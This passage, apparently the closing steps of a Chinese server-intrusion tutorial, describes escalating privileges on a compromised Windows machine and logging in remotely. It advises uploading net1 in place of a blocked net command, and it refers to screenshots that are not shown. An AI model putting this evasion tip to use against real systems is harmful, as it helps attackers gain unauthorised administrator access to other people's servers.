返回了以下数据!发生系统错误5...这很多人都遇见过!
其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!
图11
12、嘿嘿 net1后成功了! 提权成功!
图12
13、远程登录成功图13。